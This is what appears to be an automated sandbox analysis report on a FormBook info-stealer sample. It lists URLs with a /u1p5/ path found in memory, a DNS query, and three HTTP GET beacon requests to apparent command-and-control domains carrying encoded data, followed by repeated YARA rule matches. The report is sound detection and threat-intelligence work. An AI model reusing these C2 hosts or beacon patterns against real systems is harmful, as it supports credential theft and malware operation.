          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.verifyaxcx.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.verifyaxcx.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.verifyaxcx.com/u1p5/www.agengrosirfashion.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.verifyaxcx.comReferer:
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vinewineltd.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vinewineltd.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vinewineltd.com/u1p5/www.pbcgotv.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vinewineltd.comReferer:
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vzn2aai2qj.icu
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vzn2aai2qj.icu/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vzn2aai2qj.icu/u1p5/www.deutscheno1.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vzn2aai2qj.icuReferer:
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yannickrast.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yannickrast.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yannickrast.com/u1p5/www.rhoads-music.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yannickrast.comReferer:
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.vzn2aai2qj.icu
          Source: C:\Windows\explorer.exeCode function: 42_2_05566F82 getaddrinfo,setsockopt,recv,
          Source: global trafficHTTP traffic detected: GET /u1p5/?y4Mp=vL5j7Eq3si3+pqkwq9GVQc9zWaxA/P/bTusMaerk9f3EW+lc0CCc1NhXRSl0Kt4KYFMx8zSAYw==&D0GHx=5jNT HTTP/1.1Host: www.shitcoin.teamConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u1p5/?y4Mp=jmW97e0DcxHZsiDt+DmiFhziWrO1jPfkTbEIn6OHXnuLtYKLIrDwNEu/EQYt2xDuBHghXZP9DQ==&D0GHx=5jNT HTTP/1.1Host: www.marymarinho.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvD+HvWaQ2ttROIxFaz7G4unDmw6qRWL3K2g==&D0GHx=5jNT HTTP/1.1Host: www.bettingweb365.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large strings
          Source: H4vBtZsi8xAKaMm.exe, SimonGame.csLong String: Length: 22528
          Source: 1.0.H4vBtZsi8xAKaMm.exe.e30000.0.unpack, SimonGame.csLong String: Length: 22528
          Source: 1.2.H4vBtZsi8xAKaMm.exe.e30000.0.unpack, SimonGame.csLong String: Length: 22528
          Source: H4vBtZsi8xAKaMm.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
